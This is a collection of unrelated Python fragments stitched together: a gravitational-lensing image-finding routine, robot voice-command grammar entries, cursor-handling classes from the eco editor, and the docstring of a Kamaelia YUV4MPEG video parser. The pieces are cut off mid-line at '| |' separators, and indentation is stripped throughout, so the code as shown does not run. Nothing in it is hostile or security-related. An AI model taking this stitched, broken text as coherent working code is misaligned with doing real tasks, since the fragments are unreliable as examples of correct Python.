def candidate_solutions_recursive(self, sourcePos_x, sourcePos_y, kwargs_lens, min_distance=0.1, search_window=10,
verbose=False, x_center=0, y_center=0, max_recusion=3, iteration=0):
"""
finds pixels in the image plane possibly hosting a solution of the lens equation, for the given source position and lens model, using Keeton's methodology (Keeton, 2001)
:param sourcePos_x: source position in units of angle
:param sourcePos_y: source position in units of angle
:param kwargs_lens: lens model parameters as keyword arguments
:param min_distance: minimum separation to consider for two images in units of angle
:param search_window: window size to be considered by the solver. Will not find image position outside this window
:param verbose: bool, if True, prints some useful information for the user
:param x_center: float, center of the window to search for point sources
:param y_center: float, center of the window to search for point sources
:returns: (approximate) angular position of (multiple) images ra_pos, dec_pos in units of angles, related ray-traced source displacements and pixel width
:raises: AttributeError, KeyError
"""
kwargs_lens = self.lensModel.set_static(kwargs_lens)
# compute number of pixels to cover the search window with the required min_distance
numPix = int(round(search_window / min_distance) + 0.5)
x_grid, y_grid = util.make_grid(numPix, min_distance)
x_grid += x_center
y_grid += y_center
# ray-shoot to find the relative distance to the required source position for each grid point
x_mapped, y_mapped = self.lensModel.ray_shooting(x_grid, y_grid, kwargs_lens)
# Minus out the source position
x_mapped = x_mapped - sourcePos_x
y_mapped = y_mapped - sourcePos_y
# Create du_(ij), du_(i+1j), du_(ij+1), du_(i+1j+1)
x_mapped, y_mapped \
= np.reshape(x_mapped, (numPix, numPix)), np.reshape(y_mapped, (numPix, numPix))
du00 = np.transpose([np.reshape(x_mapped[:-1, :-1], (numPix-1)**2), np.reshape(y_mapped[:-1, :-1], (numPix-1)**2)])
du10 = np.transpose([np.reshape(x_mapped[1:, :-1], (numPix-1)**2), np.reshape(y_mapped[1:, :-1], (numPix-1)**2)])
du01 = np.transpose([np.reshape(x_mapped[:-1, 1:], (numPix-1)**2), np.reshape(y_mapped[:-1, 1:], (numPix-1)**2)])
du11 = np.transpose([np.reshape(x_mapped[1:, 1:], (numPix-1)**2), np.reshape(y_mapped[1:, 1:], (numPix-1)**2)])
# Compute all the cross products between each vector
ucross1 = np.cross(du00, du10)
ucross2 = np.cross(du10, du11)
ucross3 = np.cross(du11, du00)
idx1 = (ucross1*ucross2 > 0) * (ucross2*ucross3 > 0)
# 10 ucross2 11
# ucross3
# ucross1 ucross3
# ucross3
#
# 00 01
ucross1 = np.cross(du00, du01)
ucross2 = np.cross(du01, du11)
#ucross3 = np.cross(du11, du00)
idx2 = (ucross1*ucross2 > 0) * (ucross2*ucross3 > 0)
# 10 11
# ucross3
# ucross3 ucross2
# ucross3
#
# 00 ucross1 01
# Combine solutions:
idx = (idx1+idx2)>0
# # Take out all pixels that contain a critical curve:
mu = self.lensModel.magnification(x_grid, y_grid, kwargs_lens)
mu = np.reshape(mu, (numPix, numPix))
mu00 = np.reshape(mu[:-1, :-1], (numPix-1)**2)
mu10 = np.reshape(mu[1:, :-1], (numPix-1)**2)
mu01 = np.reshape(mu[:-1, 1:], (numPix-1)**2)
mu11 = np.reshape(mu[1:, 1:], (numPix-1)**2)
idxmu = (mu00*mu10>0)*(mu10*mu01>=0)*(mu01*mu11>=0)
idx1 = idx1 * idxmu
idx2 = idx2 * idxmu
#
# Get x, y on the image plane
{"params": ["Action_take", "Category", "Origin_place", "Rpos","Destiny_place"],
"Action_take": [["take"], [], [], []],
"Category": [[], [], ["category"], []],
"Origin_place": [[], [], ["place"], []],
"Rpos": [["left", "right", "center", "middle_bottom", "top"],[],[],[]],
"Destiny_place": [[], [], ["place"], []],
"conceptual_dependency": "(task (plan user_speech) (action_type get_rpose_object) (params object -Origin_place- -Rpos- -Category-) (step )) " +
"(task (plan user_speech) (action_type deliver_in_position) (params object -Destiny_place-) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
####
## Bring from/to storage
###
#$store = put the {object} into the $storage
{"params": ["Action_put", "Object", "Into", "Storage"],
"Action_put": [["put"], [], [], []],
"Object": [[], [], ["item"], []],
"Into": [["into"], [], [], []],
"Storage": [[], [], ["place"], []],
"conceptual_dependency": "(task (plan user_speech) (action_type storage_object) (params -Object- default_location -Storage- nil) (step )) ",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
{"params": ["Action_put", "Object", "Into", "Special_object","Storage"],
"Action_put": [["put"], [], [], []],
"Object": [[], [], ["item"], []],
"Into": [["into"], [], [], []],
"Special_object": [[], [], ["item"], []],
"Storage": [[], [], ["place"], []],
"conceptual_dependency": "(task (plan user_speech) (action_type storage_object) (params -Object- default_location -Storage- -Special_object-) (step )) ",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
#$store = pick up a {category} from the {placement} and put it into the $storage
#{"params": ["Action_take", "Category", "Place"],
#"Action_take": [["take"], [], [], []],
#"Category": [[], [], ["category"], []],
#"Place": [[], [], ["place"], []],
#"conceptual_dependency": "(task (plan user_speech) (action_type storage_object) (params -Category- -Place-) (step )) ",
#"verbal_confirmation": '',
#"planner_confirmed": '',
#"planner_not_confirmed": ''},
{"params": ["Action_put", "It", "Into", "Storage"],
"Action_put": [["put"], [], [], []],
"It": [["it"], [], [], []],
"Into": [["into"], [], [], []],
"Storage": [[], [], ["place"], []],
"conceptual_dependency": "(task (plan user_speech) (action_type storage_object) (params -Storage- nil) (step ))",
#"conceptual_dependency":"(task (plan user_speech) (action_type deliver_in_position) (params -Storage-) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
{"params": ["Action_put", "It", "Into", "Special_object", "Storage"],
"Action_put": [["put"], [], [], []],
"It": [["it"], [], [], []],
"Into": [["into"], [], [], []],
"Special_object": [[], [], ["item"], []],
"Storage": [[], [], ["place"], []],
"conceptual_dependency": "(task (plan user_speech) (action_type storage_object) (params -Storage- -Special_object-) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
#$findordI = $vbgor to the {room}, $vbfind the {object?}
{"params": ["Action_find", "Category"],
"Action_find": [["find", "look_for", "locate", "spot", "pinpoint"], [], [], []],
"Category": [[], [], ["category"], []],
"conceptual_dependency":"(task (plan user_speech) (action_type ask_info) (params question object -Category-) (step ))" +
"(task (plan user_speech) (action_type get_object) (params default_location) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
#Not implemented: $findorsI = $vbfind (a | the) {object meta: Robot must place it on the {placement}}
#$takeI = $vbtake the {aobject? meta: Place to } from the {placement}
{"params": ["Action_take", "Category", "Origin_place"],
"Action_take": [["take", "get", "retrieve", "grasp", "pick up"], [], [], []],
"Category": [[], [], ["category"], []],
"Origin_place": [[], [], ["place"], []],
"conceptual_dependency":"(task (plan user_speech) (action_type ask_info) (params question object -Category-) (step ))" +
"(task (plan user_speech) (action_type get_object) (params default_location -Origin_place- ) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
#$takeI = $vbtake the {aobject meta: Robot will find it on the {placement}}
#$place = $vbplace it on the {placement}
#$placeI = $vbplace it to the {placement?}
{"params": ["Action_place", "Place"],
"Action_place": [["put", "place", "leave", "set"], [], [], []],
"Place": [[], [], ["place"], []],
"conceptual_dependency":"(task (plan user_speech) (action_type deliver_in_position) (params -Place-) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
{"params": ["Action_place", "Room"],
"Action_place": [["put", "place", "leave", "set"], [], [], []],
"Room": [[], [], ["room"], []],
"conceptual_dependency":"(task (plan user_speech) (action_type ask_info) (params question object_place -Room-) (step ))" +
"(task (plan user_speech) (action_type deliver_in_position) (params default_location) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
#$mvobjI = $vbplace the {object} in the {placement?}
{"params": ["Action_place", "Object", "Room"],
"Action_place": [["put", "place", "leave", "set"], [], [], []],
"Object": [[], [], ["item"], []],
"Room": [[], [], ["room"], []],
"conceptual_dependency":"(task (plan user_speech) (action_type ask_info) (params question object_place -Room-) (step ))" +
"(task (plan user_speech) (action_type get_object) (params -Object- default_location) (step ))" +
"(task (plan user_speech) (action_type deliver_in_position) (params default_location) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
#$mvobjI = $vbplace a {object? meta: place 3 objects of the same category at {placement 1}} on the {placement 1}
{"params": ["Action_place", "Category", "Place"],
"Action_place": [["put", "place", "leave", "set"], [], [], []],
"Category": [[], [], ["category"], []],
"Place": [[], [], ["place"], []],
"conceptual_dependency":"(task (plan user_speech) (action_type ask_info) (params question object -Category-) (step ))" +
"(task (plan user_speech) (action_type get_object) (params default_object default_location) (step ))" +
"(task (plan user_speech) (action_type deliver_in_position) (params -Place-) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
#$findpsI = $vbfind {name meta: {pron sub} is (sitting | standing | lying | waving ) at the {beacon}}
{"params": ["Action_find", "Person"],
"Action_find": [["find", "locate", "spot", "pinpoint", "look_for"], [], [], []],
"Person": [[], [], ["person"], []],
"conceptual_dependency":"(task (plan user_speech) (action_type ask_info) (params question follow_place_origin -Person-) (step ))" +
"(task (plan user_speech) (action_type find_person_in_room) (params -Person-) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
#$deliverI = $vbdeliver it to {name meta: {pron sub} is (sitting | standing | lying | waving ) at the {beacon}}
{"params": ["Action_deliver", "Person"],
"Action_deliver": [["bring", "deliver", "give", "hand"], [], [], []],
"Person": [[], [], ["person"], []],
"conceptual_dependency":"(task (plan user_speech) (action_type ask_info) (params question follow_place_origin -Person-) (step ))" +
"(task (plan user_speech) (action_type find_person_in_room) (params -Person-) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
#$singleSpI= (speak | (say something)) {void meta: When asked, reply to the robot: "$whattosay" }
{"params": ["Action_say"],
"Action_say": [["speak", "say"], [], [], []],
"conceptual_dependency":"(task (plan user_speech) (action_type ask_info) (params question whattosay nil) (step ))" +
"(task (plan user_speech) (action_type wait_for_user_instruction) (params question default question) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
#and $vbguide {pron}
{"params": ["Action_guide", "Pron"],
"Action_guide": [["guide", "escort", "take", "lead", "accompany", "conduct"],[],[],[]],
"Pron": [["her", "him", "it"],[],[],[]],
"conceptual_dependency":"(task (plan user_speech) (action_type ask_info) (params question place_destiny person) (step ))" +
"(task (plan user_speech) (action_type get_object) (params man_guide) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
#$countobj = tell $repwho how many $countwhat are in the {placement 1}
{"params": ["Action_talk", "Person", "Many", "Category", "Location"],
"Action_talk": [["tell"], [], [], []],
"Person":[["me"],[],[],[]],
"Many":[["many"],[],[],[]],
"Category": [["snacks", "cutlery", "food", "drinks", "tableware", "containers", "fruits", "cleaning_stuff"], [], [], []],
"Location":[[], [], ["place"], []],
"conceptual_dependency":"(task (plan user_speech) (action_type find_how_many_category) (params -Category- -Location- nil) (step ))" +
"(task (plan user_speech) (action_type update_object_location) (params location current_loc) (step ))" +
"(task (plan user_speech) (action_type wait_for_user_instruction) (params question tell_many_obj) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
{"params": ["Action_talk", "Person", "Many", "Color", "Object", "Location"],
"Action_talk": [["tell"], [], [], []],
"Person":[["me"],[],[],[]],
"Many":[["many"],[],[],[]],
"Color":[["red", "blue", "yellow", "black", "white", "gray", "orange"],[],[],[]],
"Object": [[], [], ["item"], []],
"Location":[[],[],["place"],[]],
"conceptual_dependency":"(task (plan user_speech) (action_type find_how_many_objects) (params -Object- -Location- -Color-) (step ))" +
"(task (plan user_speech) (action_type update_object_location) (params location current_loc) (step ))" +
"(task (plan user_speech) (action_type wait_for_user_instruction) (params question tell_many_obj) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
{"params": ["Action_talk", "Person", "Many", "Color", "Category", "Location"],
"Action_talk": [["tell"], [], [], []],
"Person":[["me"],[],[],[]],
"Many":[["many"],[],[],[]],
"Color":[["red", "blue", "yellow", "black", "white", "gray", "orange"],[],[],[]],
"Category": [[], [], ["category"], []],
"Location":[[],[],["place"],[]],
"conceptual_dependency":"(task (plan user_speech) (action_type find_how_many_category) (params -Category- -Location- -Color-) (step ))" +
"(task (plan user_speech) (action_type update_object_location) (params location current_loc) (step ))" +
"(task (plan user_speech) (action_type wait_for_user_instruction) (params question tell_many_obj) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
#$countobj = count the $countwhat at the {placement 1} and $report
{"params": ["Action_count", "Category", "Location"],
"Action_count": [["count"], [], [], []],
"Category": [["snacks", "cutlery", "food", "drinks", "tableware", "containers", "fruits", "cleaning_stuff"], [], [], []],
"Location":[[], [], ["place"], []],
"conceptual_dependency":"(task (plan user_speech) (action_type find_how_many_category) (params -Category- -Location- nil) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
{"params": ["Action_count", "Color", "Object", "Location"],
"Action_count": [["count"], [], [], []],
"Color":[["red", "blue", "yellow", "black", "white", "gray", "orange"],[],[],[]],
"Object": [[], [], ["item"], []],
"Location":[[],[],["place"],[]],
"conceptual_dependency":"(task (plan user_speech) (action_type find_how_many_objects) (params -Object- -Location- -Color-) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
{"params": ["Action_count", "Color", "Category", "Location"],
"Action_count": [["count"], [], [], []],
"Color":[["red", "blue", "yellow", "black", "white", "gray", "orange"],[],[],[]],
"Category": [[], [], ["category"], []],
"Location":[[],[],["place"],[]],
"conceptual_dependency":"(task (plan user_speech) (action_type find_how_many_category) (params -Category- -Location- -Color-) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
{"params": ["Action_report", "Person"],
"Action_report": [["inform", "report"], [], [], []],
"Person":[["me"],[],[],[]],
"conceptual_dependency":"(task (plan user_speech) (action_type update_object_location) (params location current_loc) (step ))" +
"(task (plan user_speech) (action_type wait_for_user_instruction) (params question tell_many_obj) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
#$descobj = describe the objects in the {placement} to $repwho
{"params": ["Action_describe", "Object", "Place", "Person"],
"Action_describe": [["describe"], [], [], []],
"Object": [["objects", "object"], [], [], []],
"Place": [[], [], ["place"], []],
"Person":[["me"],[],[],[]],
"conceptual_dependency":"(task (plan user_speech) (action_type get_object_description) (params object -Place-) (step ))" +
"(task (plan user_speech) (action update_object_location) (params location current_loc)(step ))" +
"(task (plan user_speech) (action_type wait_for_user_instruction) (params question tell_desc_obj) (step ))",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
#$retrieve = $vbdeliver me some {category} from the $storage
{"params": ["Action_deliver", "Person", "Category", "Storage"],
"Action_deliver": [["deliver", "bring", "give"], [], [], []],
"Person":[["me"],[],[],[]],
"Category": [[], [], ["category"], []],
"Storage": [[], [], ["place"], []],
"conceptual_dependency": "(task (plan user_speech) (action_type retrieve_object) (params -Category- -Storage- nil) (step )) ",
"verbal_confirmation": '',
"planner_confirmed": '',
"planner_not_confirmed": ''},
{"params": ["Action_deliver", "Person", "Category", "Special_object","Storage"],
"Action_deliver": [["deliver", "bring", "give"], [], [], []],
"Person":[["me"],[],[],[]],
"Category": [[], [], ["category"], []],
"Special_object": [[], [], ["item"], []],
"Storage": [[], [], ["place"], []],
"conceptual_dependency": "(task (plan user_speech) (action_type retrieve_object) (params -Category- -Storage- -Special_object-) (step | |
# softdevteam/eco: lib/eco/treemanager.py
# Copyright (c) 2013--2014 King's College London
# Created by the Software Development Team <http://soft-dev.org/>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from incparser.incparser import IncParser
from inclexer.inclexer import IncrementalLexer
from treelexer.lexer import LexingError
from incparser.astree import TextNode, BOS, EOS, MultiTextNode
from grammar_parser.gparser import Terminal, MagicTerminal, IndentationTerminal, Nonterminal
try:
import __pypy__
except ImportError:
from PyQt5.QtWidgets import QApplication
from PyQt5.QtCore import QSettings
from export.jruby import JRubyExporter
from export.jruby_simple_language import JRubySimpleLanguageExporter
from export.jruby_javascript import JRubyJavaScriptExporter
from export.simple_language import SimpleLanguageExporter
from utils import arrow_keys, KEY_UP, KEY_DOWN, KEY_LEFT, KEY_RIGHT
from grammars.grammars import lang_dict, Language, EcoFile
from indentmanager import IndentationManager
from export import HTMLPythonSQL, PHPPython, ATerms
from export.cpython import CPythonExporter
from autolboxdetector import IncrementalRecognizer
import math, os
def debug_trace():
'''Set a tracepoint in the Python debugger that works with Qt'''
from PyQt5.QtCore import pyqtRemoveInputHook
from pdb import set_trace
pyqtRemoveInputHook()
set_trace()
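# Usage sketch (hypothetical call site, not from the original file): dropping
# a debug_trace() call into a Qt event handler stops execution in pdb with
# Qt's input hook removed, so the terminal prompt stays usable:
#
#     def keyPressEvent(self, event):
#         debug_trace()  # execution stops here in pdb
#         super(Editor, self).keyPressEvent(event)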
class FontManager(object):
def __init__(self):
self.fontht = 0
self.fontwt = 0
fontmanager = FontManager()
class NodeSize(object):
def __init__(self, w, h):
self.w = w
self.h = h
class Line(object):
"""Representation of a source code line.
Has a reference to the node at the beginning of that line and stores the
line's width and height values.
"""
def __init__(self, node, height=1):
self.node = node # this line's newline node
self.height = height # line height
self.width = 0 # line width
self.indent = 0 # line indentation
self.ws = 0
def __repr__(self):
return "Line(%s, width=%s, height=%s)" % (self.node, self.width, self.height)
class Cursor(object):
"""Represents the text cursor in the sourcecode view.
Stores the current node next to the cursor, the cursors offset within this
node and the current line number. Can be manipulated by the user through key
presses."""
def __init__(self, node, pos, line, lines):
self.node = node
self.pos = pos
self.line = line
self.lines = lines
self.last_x = 0
self.log = {}
def save(self, version):
self.log[version] = (self.node, self.pos, self.line)
def load(self, version, lines):
(self.node, self.pos, self.line) = self.log[version]
self.lines = lines
def clean_versions(self, version):
for key in list(self.log.keys()):
if key > version:
del self.log[key]
def copy(self):
return Cursor(self.node, self.pos, self.line, self.lines)
def store_last_x(self):
self.last_x = self.get_x()
def restore_last_x(self, text=""):
if text != "" and text[0] == "\r":
self.line += 1
self.move_to_x(len(text) - 1)
else:
self.move_to_x(self.last_x)
def left(self):
node = self.node
if type(node.symbol) is MagicTerminal:
node = node.symbol.ast.children[-1]
if not self.is_visible(node):
node = self.find_previous_visible(node)
if node.symbol.name == "\r":
self.line -= 1
if isinstance(node, BOS):
root = node.get_root()
lbox = root.get_magicterminal()
if lbox:
node = lbox.previous_terminal()
else:
self.node = node
return
if node is not self.node:
self.node = node
self.pos = len(node.symbol.name)
if self.pos > 1 and (not node.image or node.plain_mode):
self.pos -= 1
else:
# if neighbouring node is BOS, stay in box
if type(node.previous_terminal()) is BOS:
self.node = node.previous_terminal()
self.pos = 0
return
node = self.find_previous_visible(node)
self.node = node
self.pos = len(node.symbol.name)
def right(self):
node = self.node
if not self.is_visible(node):
node = self.find_next_visible(self.node)
if type(node.symbol) is MagicTerminal:
node = node.symbol.ast.children[0]
if isinstance(node, EOS):
return
if node is not self.node:
self.node = node
self.pos = 0
if node.symbol.name == "\r":
self.line += 1
if self.pos < len(node.symbol.name):
self.pos += 1
else:
node = self.find_next_visible(node)
if node.symbol.name == "\r":
self.line += 1
if isinstance(node, EOS):
self.node = self.find_previous_visible(node)
self.pos = len(self.node.symbol.name)
return
if type(node.symbol) is MagicTerminal:
node = node.symbol.ast.children[0]
node = self.find_next_visible(node)
self.node = node
self.pos = 1
if node.image and not node.plain_mode:
self.pos = len(node.symbol.name)
def jump_to(self, other):
"""Apply other attributes to self.
This ensures that the history is not lost.
`self.cursor = other.copy()` becomes
`self.cursor.jump_to(other)`.
"""
self.node = other.node
self.pos = other.pos
self.line = other.line
def jump_left(self):
if self.node.symbol.name == "\r":
self.line -= 1
self.node = self.find_previous_visible(self.node)
self.pos = len(self.node.symbol.name)
def jump_right(self):
node = self.find_next_visible(self.node)
if self.inside() or isinstance(node, EOS):
self.pos = len(self.node.symbol.name)
return
self.node = node
self.pos = len(self.node.symbol.name)
if node.symbol.name == "\r":
self.line += 1
def find_next_visible(self, node):
"""Returns the next visible node in the parse tree.
Skips over invisible nodes like IndentationTerminals and crosses
languagebox boundaries.
"""
if self.is_visible(node) or isinstance(node.symbol, MagicTerminal):
node = node.next_terminal()
while not self.is_visible(node):
if isinstance(node, EOS):
# Leave language box
root = node.get_root()
lbox = root.get_magicterminal()
if lbox:
node = lbox.next_terminal()
continue
else:
return node
elif isinstance(node.symbol, MagicTerminal):
# Enter language box
node = node.symbol.ast.children[0]
continue
elif isinstance(node, MultiTextNode):
node = node.children[0]
continue
node = node.next_terminal()
return node
def find_previous_visible(self, node, cross_lang=True):
"""Return the previous visible node in the parse tree."""
if self.is_visible(node):
if type(node.symbol) is MagicTerminal and cross_lang:
node = node.symbol.ast.children[-1]
else:
node = node.previous_terminal()
while True:
if isinstance(node, BOS):
if not cross_lang: # don't cross language border
return node
# leave lbox
root = node.get_root()
lbox = root.get_magicterminal()
if lbox:
node = lbox.previous_terminal()
continue
else:
return node
elif isinstance(node.symbol, MagicTerminal):
node = node.symbol.ast.children[-1]
continue
elif isinstance(node, MultiTextNode):
node = node.children[-1]
continue
if self.is_visible(node):
break
node = node.previous_terminal()
return node
def is_visible(self, node):
"""Checks whether a given node is visible in the source code view."""
if isinstance(node.symbol, IndentationTerminal):
return False
if isinstance(node, BOS):
return False
if isinstance(node, EOS):
return False
if isinstance(node.symbol, MultiTextNode):
return False
return True
def up(self):
"""Move the cursor a line up."""
if self.line > 0:
x = self.get_x()
self.line -= 1
self.move_to_x(x)
def down(self):
"""Move the cursor a line down."""
if self.line < len(self.lines) - 1:
x = self.get_x()
self.line += 1
self.move_to_x(x)
def home(self):
"""Jump to the beginning of the current line."""
self.node = self.lines[self.line].node
self.pos = len(self.node.symbol.name)
def end(self):
"""Jump to the end of the current line."""
if self.line < len(self.lines)-1:
self.node = self.find_previous_visible(self.lines[self.line+1].node)
else:
while not isinstance(self.node, EOS):
self.node = self.node.next_terminal()
self.node = self.find_previous_visible(self.node)
self.pos = len(self.node.symbol.name)
def move_to_x(self, x):
"""Jump to the x-th character/column position in the current line."""
node = self.lines[self.line].node
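# Walk the line's visible nodes, consuming each node's character width from x
# until it is exhausted; language boxes are entered, and image nodes count by
# their rendered width rather than their text length.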
while x > 0:
newnode = self.find_next_visible(node)
if newnode is node:
self.node = node
self.pos = len(node.symbol.name)
return
node = newnode
if type(node.symbol) is MagicTerminal:
node = node.symbol.ast.children[0]
continue
if node.image and not node.plain_mode:
x -= self.get_nodesize_in_chars(node).w
else:
x -= len(node.symbol.name)
if node.symbol.name == "\r":
self.node = self.find_previous_visible(node)
self.pos = len(self.node.symbol.name)
return
if isinstance(node, EOS):
root = node.get_root()
lbox = root.get_magicterminal()
if lbox:
node = lbox
continue
else:
self.node = self.find_previous_visible(node)
self.pos = len(self.node.symbol.name)
return
self.pos = len(node.symbol.name) + x
self.node = node
def get_x(self):
"""Get the current character/column position of the cursor."""
if self.node.symbol.name == "\r":
return 0
if isinstance(self.node, BOS):
if not self.node.get_root().get_magicterminal():
return 0
if self.node.image and not self.node.plain_mode:
x = self.get_nodesize_in_chars(self.node).w
else:
x = self.pos
node = self.find_previous_visible(self.node)
while node.symbol.name != "\r":
if isinstance(node, BOS):
if not node.get_root().get_magicterminal():
break
if node.image and not node.plain_mode:
x += self.get_nodesize_in_chars(node).w
else:
x += len(node.symbol.name)
node = self.find_previous_visible(node)
return x
def move_to_node(self, node, after=False):
tmp = node
while tmp.symbol.name != "\r" and not isinstance(tmp, BOS):
tmp = self.find_previous_visible(tmp)
line = self.get_line_from_node(tmp)
self.line = line
self.node = node
if after:
self.pos = len(node.symbol.name)
else:
self.node = self.find_previous_visible(node)
self.pos = len(self.node.symbol.name)
def get_line_from_node(self, node):
i = 0
for l in self.lines:
if l.node is node:
return i
i += 1
def get_nodesize_in_chars(self, node):
"""Calculate the size in | |
#!/usr/bin/env python
#
# Copyright (C) 2007 British Broadcasting Corporation and Kamaelia Contributors(1)
# All Rights Reserved.
#
# You may only modify and redistribute this under the terms of any of the
# following licenses(2): Mozilla Public License, V1.1, GNU General
# Public License, V2.0, GNU Lesser General Public License, V2.1
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://kamaelia.sourceforge.net/AUTHORS - please extend this file,
# not this notice.
# (2) Reproduced in the COPYING file, and at:
# http://kamaelia.sourceforge.net/COPYING
# Under section 3.5 of the MPL, we are using this text since we deem the MPL
# notice inappropriate for this file. As per MPL/GPL/LGPL removal of this
# notice is prohibited.
#
# Please contact us via: <EMAIL>
# to discuss alternative licensing.
# -------------------------------------------------------------------------
#
"""\
=============================================
Parsing and Creation of YUV4MPEG format files
=============================================
YUV4MPEGToFrame parses YUV4MPEG format data sent to its "inbox" inbox and sends
video frame data structures to its "outbox" outbox.
FrameToYUV4MPEG does the reverse - taking frame data structures sent to its
"inbox" inbox and outputting YUV4MPEG format data to its "outbox" outbox."
The YUV4MPEG file format is supported by many tools, such as mjpegtools,
mplayer/mencoder, and ffmpeg.
Example Usage
-------------
Playback a YUV4MPEG format file::
Pipeline( RateControlledFileReader("video.yuv4mpeg",readmode="bytes", ...),
YUV4MPEGToFrame(),
VideoOverlay()
).run()
Decode a dirac encoded video file to a YUV4MPEG format file::
Pipeline( RateControlledFileReader("video.dirac",readmode="bytes", ...),
DiracDecoder(),
FrameToYUV4MPEG(),
SimpleFileWriter("output.yuv4mpeg")
).run()
YUV4MPEGToFrame Behaviour
-------------------------
Send binary data as strings containing YUV4MPEG format data to the "inbox" inbox
and frame data structures will be sent out of the "outbox" outbox as soon as
they are parsed.
See below for a description of the uncompressed frame data structure format.
This component supports sending data out of its outbox to a size limited inbox.
If the size limited inbox is full, this component will pause until it is able
to send out the data. Data will not be consumed from the inbox if this component
is waiting to send to the outbox.
If a producerFinished message is received on the "control" inbox, this component
will complete parsing any data pending in its inbox, and finish sending any
resulting data to its outbox. It will then send the producerFinished message on
out of its "signal" outbox and terminate.
If a shutdownMicroprocess message is received on the "control" inbox, this
component will immediately send it on out of its "signal" outbox and immediately
terminate. It will not complete processing, or sending on any pending data.
FrameToYUV4MPEG Behaviour
-------------------------
Send frame data structures to the "inbox" inbox of this component. YUV4MPEG
format binary string data will be sent out of the "outbox" outbox.
See below for a description of the uncompressed frame data structure format.
The header data for the YUV4MPEG file is determined from the first frame.
All frames sent to this component must therefore be in the same pixel format and
size, otherwise the output data will not be valid YUV4MPEG.
This component supports sending data out of its outbox to a size limited inbox.
If the size limited inbox is full, this component will pause until it is able
to send out the data. Data will not be consumed from the inbox if this component
is waiting to send to the outbox.
If a producerFinished message is received on the "control" inbox, this component
will complete parsing any data pending in its inbox, and finish sending any
resulting data to its outbox. It will then send the producerFinished message on
out of its "signal" outbox and terminate.
If a shutdownMicroprocess message is received on the "control" inbox, this
component will immediately send it on out of its "signal" outbox and immediately
terminate. It will not complete processing, or sending on any pending data.
=========================
UNCOMPRESSED FRAME FORMAT
=========================
A frame is a dictionary data structure. It must, at minimum, contain the first 3
("yuv", "size" and "pixformat")::
{
"yuv" : (y_data, u_data, v_data) # a tuple of strings
"size" : (width, height) # in pixels
"pixformat" : pixelformat # format of raw video data
"frame_rate" : fps # frames per second
"interlaced" : 0 or not 0 # non-zero if the frame is two interlaced fields
"topfieldfirst" : 0 or not 0 # non-zero the first field comes first in the data
"pixel_aspect" : fraction # aspect ratio of pixels
"sequence_meta" : metadata # string containing extended metadata
# (no whitespace or control characters)
}
All other fields are optional when providing frames to FrameToYUV4MPEG.
YUV4MPEGToFrame only guarantees to fill in the YUV data itself. All other fields
will be filled in if the relevant header data is detected in the file.
The pixel formats recognised (and therefore supported) are::
"YUV420_planar"
"YUV411_planar"
"YUV422_planar"
"YUV444_planar"
"YUV4444_planar"
"Y_planar"
"""
from Axon.Component import component
#from Axon.Ipc import WaitComplete
from Axon.Ipc import shutdownMicroprocess, producerFinished
from Axon.AxonExceptions import noSpaceInBox
import re
from Kamaelia.Support.Data.Rationals import rational
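# A minimal sketch of the frame data structure described in the module
# docstring (assumed toy values: a 16x16 black YUV420 frame, so the Y plane is
# 16*16 = 256 bytes and the subsampled U and V planes are 8*8 = 64 bytes each):
_example_frame = {
    "yuv": ("\x00" * 256, "\x80" * 64, "\x80" * 64),  # Y, U, V plane data
    "size": (16, 16),                                 # width, height in pixels
    "pixformat": "YUV420_planar",                     # raw video pixel format
}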
class YUV4MPEGToFrame(component):
"""\
YUV4MPEGToFrame() -> new YUV4MPEGToFrame component.
Parses YUV4MPEG format binary data, sent as strings to its "inbox" inbox
